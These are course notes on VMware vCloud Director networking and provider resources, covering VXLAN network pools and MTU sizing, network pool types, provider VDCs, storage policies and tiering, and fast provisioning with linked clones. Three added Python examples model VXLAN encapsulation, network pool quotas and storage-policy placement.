The VXLAN pool is given a name derived from the name of the containing provider VDC and attached to it at creation.
You cannot delete or modify the VXLAN network pool.
You cannot create a VXLAN network pool by another method.
If you rename a provider VDC, the associated VXLAN network pool is renamed.

vCloud Director automatically sets up a network pool backed by a VXLAN. The pool is named after the provider VDC. Each provider VDC gets a unique VXLAN pool.

Even though a VXLAN pool is available, you are not required to use it. Other types of network pools can still be used with each provider VDC.

VXLAN Networking Considerations: MTU Size (Slide 3-52)

To accommodate the VXLAN encapsulation overhead, L2 maximum transmission units (MTUs) on physical switches must be set based on the following frame size considerations.

                             IPv4 (Bytes)   IPv6 (Bytes)
Guest L2 payload (MTU)       1500           1500
Guest L2 header              14             14
Optional guest VLAN tag      4              4
VXLAN header                 8              8
UDP header                   8              8
IP header                    20             40
Optional outer VLAN tag      4              4
Outer frame header           14             14
IPv6 data and control        -              8
Frame size                   1572           1600
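A byte-level construction of the VXLAN encapsulation the table describes, as an added Python example (not vCloud Director or vSphere code). It assembles a guest Ethernet frame with a 1500-byte payload and an 802.1Q tag, wraps it in VXLAN, UDP, IPv4 and an outer tagged Ethernet header, and checks that the result is the 1572 bytes the IPv4 column gives; the IPv6 column is reproduced by summing the table rows. Header layouts follow RFC 7348; the MAC and VTEP IP addresses, VNI and payload are constructed, and UDP port 4789 is the IANA-assigned VXLAN port, which the page does not mention. Two things the table does not show are visible here: the VNI is a 24-bit field, which is where the 16.7 million figure on the benefits slide comes from, and the guest payload travels unchanged inside the outer packet, which is the point of the later note that VXLAN isolates traffic but does not encrypt it.

```python
"""Builds a VXLAN-encapsulated Ethernet frame byte by byte so that the MTU
table on slide 3-52 can be checked against real header sizes, and shows the
24-bit VXLAN network identifier (VNI) and the unencrypted payload on the wire.

Added example, not vCloud Director or vSphere code: the MAC and IP addresses,
VNI and payload are constructed; UDP port 4789 is the IANA VXLAN port (not on
the page); header layouts follow RFC 7348.
"""
import struct

VXLAN_UDP_PORT = 4789
ETHERTYPE_IPV4, ETHERTYPE_VLAN = 0x0800, 0x8100
MAX_VNI = (1 << 24) - 1  # 24-bit VNI: 16,777,216 identifiers, versus 4094 VLANs


def ethernet_header(dst_mac, src_mac, ethertype, vlan_id=None):
    """14-byte Ethernet header, 18 bytes with an 802.1Q tag."""
    hdr = bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
    if vlan_id is not None:
        hdr += struct.pack("!HH", ETHERTYPE_VLAN, vlan_id & 0x0FFF)
    return hdr + struct.pack("!H", ethertype)


def vxlan_header(vni):
    """8 bytes: flags (I bit set), 24 reserved bits, 24-bit VNI, 8 reserved bits."""
    if not 0 <= vni <= MAX_VNI:
        raise ValueError("VNI must fit in 24 bits")
    return bytes([0x08, 0, 0, 0]) + struct.pack("!I", vni << 8)


def encapsulate(inner_frame, vni, outer_vlan=None):
    """MAC-in-IP: guest frame -> VXLAN -> UDP -> IPv4 (20-byte header) -> outer Ethernet."""
    vx = vxlan_header(vni) + inner_frame
    udp = struct.pack("!HHHH", 49152, VXLAN_UDP_PORT, 8 + len(vx), 0) + vx  # checksum 0 = none
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))  # constructed VTEP addresses
    outer = ethernet_header("00:50:56:aa:00:01", "00:50:56:aa:00:02", ETHERTYPE_IPV4, outer_vlan)
    return outer + ip + udp


def parse_vni(frame):
    """Read the VNI back: skip outer Ethernet (and VLAN tag), IPv4 header, UDP header."""
    off = 12
    ethertype = struct.unpack_from("!H", frame, off)[0]
    off += 2
    if ethertype == ETHERTYPE_VLAN:
        off += 4  # TCI plus the real EtherType
    off += (frame[off] & 0x0F) * 4  # IPv4 IHL
    off += 8  # UDP header
    return struct.unpack_from("!I", frame, off + 4)[0] >> 8


def table_frame_size(ipv6):
    """Sum of the rows in the slide's table for the chosen outer IP version."""
    rows = {"guest L2 payload": 1500, "guest L2 header": 14, "guest VLAN tag": 4,
            "VXLAN header": 8, "UDP header": 8, "IP header": 40 if ipv6 else 20,
            "outer VLAN tag": 4, "outer frame header": 14}
    if ipv6:
        rows["IPv6 data and control"] = 8  # the table's extra IPv6 row
    return sum(rows.values())


if __name__ == "__main__":
    payload = b"\xaa" * 1500  # constructed guest payload at the default MTU
    inner = ethernet_header("00:50:56:01:00:2c", "00:50:56:01:00:2b", ETHERTYPE_IPV4, vlan_id=10) + payload
    frame = encapsulate(inner, vni=5000, outer_vlan=20)
    print(len(inner), "byte guest frame ->", len(frame), "bytes on the wire; VNI", parse_vni(frame))
    print("payload visible in outer frame:", payload in frame)
```

The constructed IPv4 frame comes out at exactly the table's 1572 bytes, so a physical switch MTU below that would drop or fragment tagged guest frames at the default 1500-byte guest MTU; without the outer VLAN tag the frame is 1568 bytes.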

Benefits of VXLAN Network Pools (Slide 3-53)

vSphere VXLAN networks provide the following benefits:
Logical networks spanning layer 3 boundaries
Logical networks spanning multiple racks on a single layer 2
Broadcast containment
Higher performance
Greater scaling than VLANs
  VLANs are limited to 4094 networks.
  VXLAN allows up to 16.7 million networks.

Drawbacks of VXLAN Network Pools (2) (Slide 3-55)

vSphere VXLAN networks have the following drawbacks:
For Link Aggregation Control Protocol (LACP), 5-tuple hash distribution must be enabled.
If VXLAN traffic is traversing routers, then multicast routing must be enabled.
  The recommended multicast protocol to deploy for this scenario is Bidirectional Protocol Independent Multicast (PIM-BIDIR), because the hosts act as both multicast speakers and receivers at the same time.
  PIM is required only if two or more hops are between VTEPs.
For more information about VXLAN in a vCloud environment, see the vShield Administration Guide.

Network Pool Advantages and Disadvantages (1) (Slide 3-56)

VLAN backed:
  Advantages: Flexible. No special MTU settings. Routable.
  Disadvantages: Requires more VLAN ID management. Physical switches must be programmed for VLAN ranges and set to VLAN trunking.
vCloud Director isolated network backed:
  Advantages: Easy to set up. No complicated VLAN ranges to track. Very secure.
  Disadvantages: Nonroutable. Requires change to MTU settings.
Port group backed:
  Advantages: Can be used with both standard switches and distributed switches.
  Disadvantages: Difficult to manage. No automatic network deployment. One-to-one ratio of port groups to networks in the pool. Manual configuration of VLAN IDs required.

Different types of network pools have different advantages and disadvantages. A solid understanding of these advantages and disadvantages can help vCloud administrators decide when to use which type of network pool.

Network Pools Summary (1) (Slide 3-58)

• Network pools are the network resource of an organization VDC.

• Organization VDC networks use network pools.

• All vApp networks use network pools.

• External networks do not use network pools.

• Organization VDC networks and vApp networks can be deployed only when resources are available in the assigned network pool.

Organization networks that are routed or isolated use network pools. Organization networks that direct-connect do not use network pools. All vApp networks use network pools. Fenced vApps use network pools.

External networks do not use network pools because external networks are created by the provider (cloud administrator). The networks are managed by the provider. They are not a resource of the organization.

Every organization is limited in its resources. Organization networks and vApp networks can be deployed only if enough resources are available in an assigned network pool.

Multiple organization VDCs can exist in an organization and can connect to a single network pool.

In each organization VDC, only a single network pool is available.


Network Pools Summary (2) (Slide 3-59)

Four types of network pool backing are possible:

• VLAN

• vCloud Director isolated networks

• Port groups

• VXLAN


Module 3 VMware vCloud Director Networking 109


Lab 2: Configuring VMware vCloud Director Network Pools (Slide 3-60)

Configure vCloud Director network pools


Lesson 4: vCloud Director Networking Objects in vSphere (Slide 3-62)


Learner Objectives (Slide 3-63)

By the end of this lesson, you should be able to meet the following objective:

• Locate vCloud Director networking objects in the vSphere Web console


External Network Port Groups (Slide 3-64)

An external network is backed by a port group on a standard switch or distributed switch.


Network Pools and Deployed Networks (Slide 3-65)

For network pools, the pool is defined as either a preconfigured port group or a distributed switch.

The networks deployed by using the network pool are listed under the containing object.


Review of Learner Objectives (Slide 3-67)

You should be able to meet the following objective:

• Locate vCloud Director networking objects in the vSphere Web console


You Are Here (Slide 4-2)

• Course Introduction

• VMware vCloud Director Architecture and Components

• VMware vCloud Director Networking

• Managing VMware vCloud Director Resources

• Managing VMware vSphere Resources

• Monitoring VMware vCloud Director Components

• VMware vCloud Director Providers

• VMware vCloud Director Organizations

• VMware vCloud Director Basic Security Components

• VMware vCloud Director Organization Users

• VMware vCloud Director Installation


About Provider VDCs (Slide 4-5)

A provider VDC is a collection of vSphere resources (storage, CPU, and memory) that gives vCloud Director the ability to manage and use those resources. Organizations get their resources from organization VDCs.

Each organization VDC is a subset of provider VDC resources that are available to an organization.


Module 4 VMware vCloud Director Providers 123


VMware® vCloud Director® has two types of virtual data centers (VDCs):

• A provider virtual data center 

• An organization virtual data center 

A provider virtual data center is a collection and an abstraction of VMware vSphere® resources:

• Storage

• CPU

• Memory

Resource Groups (Slide 4-6)

A resource group consists of standard VMware vSphere® Distributed Resource Scheduler or VMware vSphere® High Availability clusters that provide resources to a cloud.

[Figure: Management Cluster (a DRS/vSphere HA cluster running vCenter Server, vCloud Director, the database server, vShield Manager, and vCenter Chargeback) alongside Resource Groups (DRS/vSphere HA clusters)]


If you have separated vCloud Director management functions into a separate VMware vSphere® Distributed Resource Scheduler™ (DRS) management cluster, then you will have vCloud Director resources provided by other vSphere DRS clusters. Each VMware® vCenter Server™ system can support multiple vSphere DRS clusters. But for management purposes, you might find it simpler to have one vCenter Server system manage only one vSphere DRS cluster. If you decide to manage multiple DRS clusters under a single vCenter Server system, you should group related clusters together. As you plan your architecture, remember that providers are based on the resources managed by vCenter Server. A single provider virtual data center can encompass more than a single vCenter Server system.

[Figure: DRS/vSphere HA clusters. Each group: a set of VMware® ESX® or VMware® ESXi hosts managed by a single VMware® vCenter Server system or VMware® vShield Manager server pairing]

Types of Resources (Slide 4-7)

VDCs work with three types of resources:

• CPU

• Memory

• Storage

CPU and memory come from vSphere resource pools.

Storage comes from vSphere datastores that have been identified in a vSphere storage policy.


Resource pools are usually configured with each vSphere DRS cluster being organized into a single resource pool. However, you can subdivide a vSphere DRS cluster into smaller resource pools.

In vSphere 5.5, storage should be organized into a storage policy. The use of a vSphere storage policy is not required. You can configure provider virtual data centers with direct access to vSphere datastores. But the use of a vSphere storage policy makes the management of storage easier.

Provider VDCs (Slide 4-8)

[Figure: Gold Provider VDC, Silver Provider VDC, and Bronze Provider VDC]


Virtual data centers are built on vSphere resources. CPU capacity, memory, and storage are at the hardware level. vSphere collects those resources into resource pools and datastores. Provider virtual data centers are built directly on top of vSphere resource pools and datastores. Organization virtual data centers get their resources from provider virtual data centers.

Network Resources Associated with Provider VDCs (Slide 4-9)

[Figure: Organization VDCs inside a provider VDC. External networks (available to the provider VDC) are built from vSphere port groups. Network pools (associated with organization VDCs) are built from vSphere port groups, virtual switches, VLANs, VXLANs, and vCloud Director isolated networks]


Organization virtual data centers are collections of resources (CPU, disk, memory, and networks) that provide an organization's resources.

Relationships exist between organizations, network pools, and organization virtual data centers, including the following:

• Each organization virtual data center can be assigned only one network pool.

• A single network pool can be used by multiple organization virtual data centers.

A single organization can connect to multiple network pools by leveraging multiple organization virtual data centers.

Organization networks are built on network pools. Organization networks can be created before creating an organization virtual data center.

When you create a provider VDC, you are notified about which external networks are available to that provider.

Organization VDCs are directly associated with network pools, with quotas.

You must define network pools before you define organization VDCs.
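The network pool rules stated on this slide and in the Network Pools Summary notes earlier in this module can be checked mechanically. The following Python model is an added example written for this page; it is not vCloud Director code and uses constructed names (vlan-pool, org-vdc-a, org-vdc-b) and made-up capacity and quota figures. It enforces that a direct-connected organization network consumes nothing from the pool, that each organization VDC draws from exactly one pool under its own quota, and that two organization VDCs sharing one pool compete for the same backing capacity, so one tenant's deployment can fail because another tenant exhausted the pool even though its own quota still had room. That shared-capacity failure mode is why quotas alone are not a capacity guarantee.

```python
"""Constructed model of how vCloud Director network pools are consumed.
Added example for this page, not vCloud Director's own code; all names,
capacities and quotas below are made up."""
from dataclasses import dataclass, field
from enum import Enum


class NetType(Enum):
    DIRECT = "direct"      # org VDC network directly connected to an external network
    ROUTED = "routed"      # org VDC network behind an edge gateway
    ISOLATED = "isolated"  # org VDC network with no external connectivity
    VAPP = "vapp"          # any vApp network, fenced or not


class DeployError(Exception):
    """Raised when a network cannot be deployed from the assigned pool."""


@dataclass
class NetworkPool:
    name: str
    capacity: int                                 # networks the backing can supply (e.g. VLAN IDs in range)
    deployed: list = field(default_factory=list)  # names of networks currently drawn from the pool

    def free(self) -> int:
        return self.capacity - len(self.deployed)


@dataclass
class OrgVdc:
    name: str
    pool: NetworkPool            # exactly one pool per org VDC; the pool exists before the VDC
    quota: int                   # maximum pool-backed networks this org VDC may hold
    networks: list = field(default_factory=list)

    def pool_backed(self) -> int:
        return sum(1 for _, kind in self.networks if kind is not NetType.DIRECT)


def deploy_network(vdc: OrgVdc, name: str, kind: NetType) -> bool:
    """Deploy a network in vdc; return True if it consumed a pool resource."""
    if kind is NetType.DIRECT:
        # Direct-connected org networks ride the external network; no pool resource used.
        vdc.networks.append((name, kind))
        return False
    if vdc.pool_backed() >= vdc.quota:
        raise DeployError(f"{vdc.name}: quota of {vdc.quota} pool-backed networks reached")
    if vdc.pool.free() <= 0:
        raise DeployError(f"{vdc.name}: network pool {vdc.pool.name} is exhausted")
    vdc.pool.deployed.append(name)
    vdc.networks.append((name, kind))
    return True


def demo() -> dict:
    """Two org VDCs share one constructed pool of three networks."""
    pool = NetworkPool("vlan-pool", capacity=3)
    vdc_a = OrgVdc("org-vdc-a", pool, quota=2)
    vdc_b = OrgVdc("org-vdc-b", pool, quota=2)
    results = {}
    results["direct_uses_pool"] = deploy_network(vdc_a, "a-direct", NetType.DIRECT)
    deploy_network(vdc_a, "a-routed", NetType.ROUTED)   # pool 1/3 used
    deploy_network(vdc_a, "a-vapp", NetType.VAPP)       # pool 2/3 used, org-vdc-a at quota
    try:
        deploy_network(vdc_a, "a-isolated", NetType.ISOLATED)
        results["a_quota_enforced"] = False
    except DeployError:
        results["a_quota_enforced"] = True
    deploy_network(vdc_b, "b-isolated", NetType.ISOLATED)  # pool 3/3 used
    try:
        deploy_network(vdc_b, "b-vapp", NetType.VAPP)  # org-vdc-b under quota, but pool empty
        results["pool_exhausted"] = False
    except DeployError:
        results["pool_exhausted"] = True
    results["pool_free"] = pool.free()
    results["a_networks"] = len(vdc_a.networks)
    return results


if __name__ == "__main__":
    print(demo())
```

The model keeps the pool's capacity and each org VDC's quota as separate checks because the page describes them as separate limits: the quota bounds what one tenant may take, while the pool's backing bounds what all tenants together can take.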

vCloud Resources (Slide 4-10)

vSphere datastores are organized with vSphere storage policies.

Memory and CPU resources are configured into resource pools.

Storage policies and resource pools are attached to provider VDCs.

Resources are allocated from provider VDCs to organization VDCs.

[Figure: vSphere and VCD layers: External Network, Organization Network, vApp Network, Network Pool, Provider VDC, Organization VDC]


vSphere datastores are offered to vCloud Director as available storage through vSphere storage policies. This storage is divided into provider virtual data centers. Organization virtual data centers can use storage from a single provider. A single organization can have multiple organization virtual data centers, each with a different type of storage.

The allocation of storage to resource clusters can vary depending upon how provider virtual data centers are being allocated. If you are following the best practice recommendation of using a 1:1 mapping between provider virtual data centers and DRS clusters, then the recommendation for storage is no different between a cloud resource cluster and a standard vSphere DRS cluster. The exception is that if vSphere DRS clusters are being used as cloud resource clusters, they might require larger datastores.

If resource pools are used for backing provider virtual data centers instead of DRS clusters, consider using different types of datastores to offer multiple tiers of storage that can be grouped during the provider virtual data center creation phase.

[Figure: Physical layer (VLAN physical network, physical host, FC-SCSI storage, NFS/iSCSI storage) and vSphere layer (DRS cluster, resource pool, storage policy, distributed switch, distributed port group)]

Relationship Between Networks and Provider VDCs (Slide 4-11)

Networks are not considered to be part of VDCs.

When you create a provider VDC, vCloud Director reports which external networks are available to the cloud structures that use the new provider VDC.


When you create a provider virtual data center, networks are not considered to be a part of the virtual data center. But the vCloud Director UI indicates which external networks are available, based on the resources (DRS clusters and resource pools) that you have selected as resources for the virtual data center.

About Storage Provided to vCloud Director (Slide 4-12)

Shared storage is required.

vSphere DRS clusters are required.

Supported storage is based on the vSphere hardware compatibility list:

• Fibre Channel (FC)

• Fibre Channel over Ethernet

• NFS

• iSCSI


vCloud Director requires shared storage. All of the storage that is supported is based on the vSphere hardware compatibility list. This storage includes:

• Fibre Channel

• Fibre Channel over Ethernet

• NFS

• iSCSI

All VMware® ESXi™ hosts that provide storage to vCloud Director must be members of DRS clusters. vCloud Director is aware only of storage that is presented to it as datastores from vSphere.

vCloud Director storage:

• vCloud Director sees datastores only because it operates at a higher layer than vCenter Server.

• vSphere sees the underlying technology.

About Using vSphere Storage Policies (Slide 4-13)

Some storage arrays can communicate with VMware vSphere® API for Storage Awareness.

A storage device can be assigned user-defined tags in vSphere. vSphere API for Storage Awareness capabilities and user-defined tags are used to organize storage with a storage policy.

Storage that is identified by a storage policy can be assigned to provider VDCs.

Each provider VDC can use storage identified in more than one storage policy. Organization VDCs are assigned storage from a single provider VDC.

Organization VDCs can use storage identified in more than one storage policy.

A vSphere storage policy is based on either VMware vSphere® API for Storage Awareness™ capabilities or user-defined storage capabilities.

When you create a provider virtual data center, you must assign at least one vSphere storage policy to the provider virtual data center. You can also assign storage from more than one vSphere storage policy to a single provider virtual data center.

Organization virtual data centers get their storage from a single provider virtual data center. If the provider virtual data center has access to storage from more than one vSphere storage policy, storage from those same multiple instances of a vSphere storage policy is available to the organization virtual data center.

NOTE

The use of a vSphere storage policy is not required. A vSphere storage policy must still be defined on the resource cluster. But when a provider virtual data center is created, you can select one vSphere storage policy and then have all of the shared storage covered by any vSphere storage policy available to the provider virtual data center. The VMware® best practice is to use a vSphere storage policy.

Storage Considerations (Slide 4-14)

Configure storage with vSphere best practices in mind.

Shared storage is required.

Allocate LUNs on a cluster-by-cluster basis.

Other considerations:

• The use of raw device mappings is not supported.

• NFS share is required for multiple cells.

• You can use storage policies to distribute virtual machine disks to different storage tiers.

vSphere DRS clusters used with vCloud Director must be configured to use automated vSphere DRS. Automated vSphere DRS requires shared storage attached to all hosts in a vSphere DRS cluster.

Raw device mappings cannot be used. They are not supported. Using an RDM breaks the mobility of VMware vSphere® vApps™.

The upload NFS share is mandatory only in multicell deployments. VMware recommends the creation of an upload NFS share for all vCloud Director deployments. The configuration of an upload NFS share makes it easier to add cells later, even if you originally planned to have only one cell.

The NFS share must be as large as the biggest potential vApp or media item that will be uploaded into the catalog. You also must have enough storage space in the NFS share to take into account concurrent uploads. The best practice is to start with at least 500GB in the NFS upload share.

Storage should be common in the cluster. No mixed RAID or disk types are allowed in the same cluster.

Storage should be organized into tiers based on cost and performance. These tiers are usually managed by vSphere storage policies. Virtual machines can have different disks assigned to different storage tiers based on vSphere storage policies. For example, a customer might have an application that was a high-speed search engine attached to a read-only database. The data for the database might be stored on a very fast solid-state drive (SSD), and the virtual machine base disk with the operating system might be assigned to less expensive storage.


Storage Tiering (Slide 4-16)

Organize storage in tiers.

Separate tiers based on cost, speed, capacity, or features.

The best practice is to assign entire vSphere DRS clusters to a specific tier.

A single resource pool provides all CPU and memory in the cluster to the provider VDC.

All shared storage in the vSphere DRS cluster is assigned to the provider VDC.

Subdivide a single vSphere DRS cluster with storage policies and resource pools only when resources are limited.

Storage Tiering and Storage Policies (Slide 4-17)

All available storage policies across selected clusters are listed at provider VDC creation.

Organization VDC storage policies are based on a subset of storage policies provided by the provider VDC.

Each organization VDC has an associated default storage policy.

All virtual machines have an associated storage policy that defaults to the organization VDC storage policy.

Virtual machine placement is based on storage policies.

You can use different storage policies with different virtual machine disks in the same virtual machine.
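The storage policy relationships described on Slide 4-13 and on this slide (an organization VDC's policies are a subset of its single provider VDC's policies, each organization VDC has a default policy, each disk of a virtual machine may carry its own policy, and placement is driven by policy) can be expressed as a small validation and placement model. The following Python is an added example written for this page, not vCloud Director's own code; the datastore, policy and tenant names and the free-space figures are constructed. It rejects an organization VDC whose policy set reaches outside its provider VDC, rejects a disk that requests a policy the tenant was never granted, and otherwise places each disk on a datastore that satisfies its (explicit or default) policy.

```python
"""Constructed model of storage-policy inheritance from a provider VDC to an
organization VDC and of policy-driven disk placement. Added example for this
page, not vCloud Director's own code; all names and sizes are made up."""
from dataclasses import dataclass


class PolicyError(ValueError):
    """Raised for a policy assignment or placement the model does not allow."""


@dataclass(frozen=True)
class Datastore:
    name: str
    policy: str    # storage policy this datastore satisfies (VASA capability or user-defined tag)
    free_gb: int


@dataclass
class ProviderVdc:
    name: str
    datastores: list

    def policies(self) -> set:
        """All storage policies listed at provider VDC creation."""
        return {ds.policy for ds in self.datastores}


@dataclass
class OrgVdc:
    name: str
    provider: ProviderVdc          # storage comes from a single provider VDC
    policies: set                  # must be a subset of the provider's policies
    default_policy: str            # applied to any disk without an explicit policy

    def __post_init__(self):
        missing = self.policies - self.provider.policies()
        if missing:
            raise PolicyError(f"{self.name}: policies {sorted(missing)} not offered by {self.provider.name}")
        if self.default_policy not in self.policies:
            raise PolicyError(f"{self.name}: default policy {self.default_policy!r} not in org VDC policies")


def place_disks(vdc: OrgVdc, disks: list) -> dict:
    """Map each (disk_name, size_gb, policy_or_None) to a datastore name.

    A disk may carry its own policy; a missing policy falls back to the org VDC
    default. Only datastores that satisfy the policy and still have room are
    candidates, and the one with the most free space is chosen.
    """
    placement = {}
    for disk_name, size_gb, policy in disks:
        policy = policy or vdc.default_policy
        if policy not in vdc.policies:
            raise PolicyError(f"{vdc.name}: disk {disk_name} requests policy {policy!r} outside the org VDC")
        candidates = [ds for ds in vdc.provider.datastores
                      if ds.policy == policy and ds.free_gb >= size_gb]
        if not candidates:
            raise PolicyError(f"no datastore under policy {policy!r} has {size_gb} GB free")
        placement[disk_name] = max(candidates, key=lambda ds: ds.free_gb).name
    return placement


def demo() -> dict:
    """Constructed provider VDC with three tiers; the tenant is granted only two."""
    provider = ProviderVdc("pvdc-01", [
        Datastore("ds-ssd-01", "gold", free_gb=500),
        Datastore("ds-sas-01", "silver", free_gb=2000),
        Datastore("ds-sas-02", "silver", free_gb=1500),
        Datastore("ds-sata-01", "bronze", free_gb=8000),
    ])
    tenant = OrgVdc("org-vdc-tenant-a", provider,
                    policies={"gold", "silver"}, default_policy="silver")
    results = {"placement": place_disks(tenant, [("os-disk", 40, None),      # default: silver
                                                 ("db-disk", 200, "gold")])}  # explicit per-disk policy
    try:
        place_disks(tenant, [("archive", 100, "bronze")])   # bronze exists, but not for this tenant
        results["bronze_rejected"] = False
    except PolicyError:
        results["bronze_rejected"] = True
    try:
        OrgVdc("org-vdc-bad", provider, policies={"gold", "platinum"}, default_policy="gold")
        results["superset_rejected"] = False
    except PolicyError:
        results["superset_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The subset check in `OrgVdc.__post_init__` is the tenancy boundary: a tenant can only ever reach storage tiers the provider administrator explicitly granted to its organization VDC, even when the provider VDC behind it contains more.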

Storage DRS and Storage vMotion (Slide 4-18)

VMware vSphere® Storage DRS is supported by vCloud Director 5.5.

When a virtual machine is migrated by using vSphere Storage vMotion, storage policies are used to determine virtual machine placement.

You can use the VMware vSphere® Web Client or VMware vCloud® API to manually relocate virtual machine disk files under the following conditions:

• The target datastore is part of the same organization VDC as the vApp.

• All virtual disks for a virtual machine are migrated to the same datastore.


The best practice for using VMware vSphere® Storage DRS™ is to configure vSphere storage policies and vSphere datastore clusters. VMware vSphere® Storage vMotion® migration of virtual machines is then handled automatically by vSphere based on the configuration of the vSphere storage policies, datastore clusters, and vSphere Storage DRS rules. This type of configuration provides optimal performance as some datastores become too full or too busy.

You can use either VMware vSphere® Client™ or VMware vCloud® API to manually migrate a single virtual machine, but such migration should be done carefully.

CAUTION

Use of the vSphere Client to manually migrate a virtual machine when that virtual machine is part of a vCloud Director vApp can cause vCloud Director problems. This statement is true for both storage location migrations and host migrations. The vSphere Client displays a warning message if you try to directly manage an item that is managed by vCloud Director.

If you must move virtual machines off a datastore:

• The datastore must belong to a datastore cluster enabled by vSphere Storage DRS.

• Use the vSphere Web Client to place the datastore into Storage Maintenance Mode.

• vSphere Storage DRS automatically moves all virtual machines on the datastore to other datastores in the datastore cluster enabled by vSphere Storage DRS.

Provider VDCs and Service Levels (Slide 4-19)

Create multiple provider VDCs to differentiate computing levels or performance characteristics of a service offering.

Provider VDCs enable the cloud provider to offer different classes of service with associated performance, availability, and cost characteristics.

[Figure: Provider VDC: Gold and Provider VDC: Silver, each with its own storage, CPU, memory, and external networks]


A provider virtual data center (VDC) combines the compute and memory resources of a single vCenter Server resource pool with the storage resources of one or more datastores connected to that resource pool. A provider VDC is the source for organization VDCs.

For provider VDCs:

• vSphere resources are abstracted in the form of provider VDCs.

• Provider VDCs have a 1:1 relationship with vSphere resource pools.

• The best practice is to map the provider VDC to the full DRS cluster instead of breaking a DRS cluster into smaller resource pools.

Service levels for infrastructure capacity offered to the cloud tenant are differentiated at the provider VDC level. Define your service-level agreement (SLA) for the service being offered. For example, you might create three SLA tiers: Tier-1: Production, Tier-2: QA, and Tier-3: Dev.

With provider VDCs, you can pool infrastructure resources to create standard offerings. You can create multiple provider VDCs for users in different geographic locations or business units, or for users with different performance requirements. For example, you can combine your best-of-breed compute resources with your fastest storage resources to create a Gold provider VDC. You can charge consumers who use the Gold provider VDC a higher price for the resources than consumers who use resources from a Silver or Bronze provider VDC. Likewise, you can create clusters of hosts running similar hardware and create provider VDCs based on the type of hardware providing the compute resources.

When you create a provider VDC, vCloud Director prepares each host in the cluster associated with the resource pool by installing an agent on each host. This process does not require a restart of the host system.


It is possible to attach multiple provider VDCs to the same vSphere storage policy. The attachment of multiple provider VDCs to the same vSphere storage policy is not a best practice, unless these multiple provider VDCs are designed to provide the same level of service.

Create multiple provider VDCs to differentiate computing levels or performance characteristics of a service offering. Segment by capacity, availability, or performance type. An example of differentiating by availability is n+1 for a Bronze provider VDC versus n+2 for a Silver provider VDC. As the level of expected consumption increases for a given provider VDC, add hosts to the cluster from vCenter Server and attach more datastores.

Create different provider VDCs to differentiate between:

• Performance levels (different hardware, CPU, RAM, disk, and so on)

• Different availability levels (no HA, HA n+1, HA n+2, ... HA n+4)

• Fast versus full provisioning

• Special licensing requirements, where software is needed to be licensed for all cores. A dedicated Oracle cluster is one example.

As the number of hosts in the cluster backing a provider VDC approaches the halfway mark of vSphere limits, consider implementing controls to preserve room. Implement these controls to preserve room well ahead of reaching the cluster limits. For example, do not add additional tenants to this particular VDC and use the additional hosts to be added to address increased resource demand for the existing tenants. If the cluster backing a provider VDC has reached the maximum number of hosts per vSphere design guidelines, create a provider VDC associated with a new cluster.

For sizing a provider VDC, consider the following:

• Expected number of virtual machines

• Size of virtual machines (CPU, RAM, disk)

Providers and Virtual Machine Hardware (Slide 4-23)

When you create a provider, you must specify the planned hardware level for the virtual machines that the provider will support.

• Hardware version 8 requires vSphere 5 ESXi hosts.

• Hardware version 9 requires vSphere 5.1 ESXi hosts.

• Hardware version 10 requires vSphere 5.5 ESXi hosts.


Elastic VDCs (Slide 4-24)

Provider VDCs can span multiple vSphere DRS clusters:

• All vSphere DRS clusters must be managed by the same vCenter Server system.

• Virtual Extensible LAN (VXLAN) fabric is required.

• Organization VDCs must be configured as pay-as-you-go or allocation pool models when provider VDCs span multiple vSphere DRS clusters.


Fast Provisioning Using Linked Clones (Slide 4-25)

Fast provisioning:

• Provisions new virtual machines from a template without replicating the entire image

• Links the images (clones) so that common elements are stored only once

Benefits:

• Increased elasticity

• Increased operational efficiency

[Figure: a template vmdk with linked-clone vmdks sharing it]


Fast provisioning enables rapid provisioning of vApps with vSphere linked clones. A linked clone uses the same base disk as the original, with a chain of delta disks to track the differences between the original and the clone. Fast provisioning is enabled by default when allocating storage to an organization VDC. If an organization administrator disables fast provisioning, all provisioning operations result in full clones.

Fast provisioning benefits:

• Increased elasticity: The ability to quickly provision vApps enables cloud applications to scale up as needed, because a vApp can be deployed from a catalog using linked-clone technology.

• Increased operational efficiency: Use of linked clones typically results in a significant improvement in storage utilization.


Shadow Virtual Machines Enabling Cross-Datastore Provisioning (Slide 4-26)

A shadow virtual machine enables cross-datastore provisioning and is invisible to end users.

(Figure: vCloud Director 5.5 managing vCenter Server 1 and vCenter Server 2)


vSphere limits the use of linked clones: linked clones can be created only within a single datastore. vCloud Director uses shadow virtual machines to allow linked clones to be deployed across multiple datastores.

When vCloud Director deploys a virtual machine from a catalog, the standard procedure is to deploy only a linked clone. But if a user requests the deployment of a virtual machine into an organization VDC that is different from the organization VDC in which the catalog is hosted, vCloud Director creates a shadow virtual machine.

After the shadow virtual machine is created, subsequent linked clones are deployed fast, because you are deploying linked clones to the same datastore.

For a linked clone in a single datastore, the linked clone is created almost instantaneously.

If a linked clone is requested on a different datastore, vCloud Director makes a full copy of the source virtual machine on the destination datastore and then creates a linked clone. This full copy operation takes more time than a standard linked clone creation. Subsequent linked clones are almost instantaneous.

Because vCloud Director supports multiple vCenter Server systems, a user can request a linked clone on a datastore that is on a different vCenter Server system. In this case, vCloud Director creates a shadow virtual machine on the destination datastore before it creates the linked clone.

(Figure: datastore-1, datastore-2, and datastore-3 holding linked clones VM-2(L) through VM-6(L); on the datastores that do not hold the original, the linked clones are built on a shadow virtual machine VM(S))

Considerations for Fast Provisioning (Slide 4-27)

• Fast provisioning requires vSphere 5.x (vCenter Server 5.x and ESXi 5.x).

• The best practice is to base each provider VDC on a dedicated cluster.

• Tree depth is limited to 31. At the 32nd level, a new base disk is deployed.

• The use of linked clones is limited to a single datastore. For cross-datastore deployment, a new shadow virtual machine is deployed.

• Some in-guest operations cause many writes (increasing delta disk size): defragmentation, memory dumps, and application logs.


Fast provisioning requires vCenter Server 5.x and ESXi 5.x hosts. If the provider VDC on which the organization VDC is based contains VMware® ESX® 4.x hosts, fast provisioning is not supported. If a cluster backing the provider VDC contains both ESX 4.x and ESXi 5.x hosts, the fast provisioning option is not available during organization VDC creation.

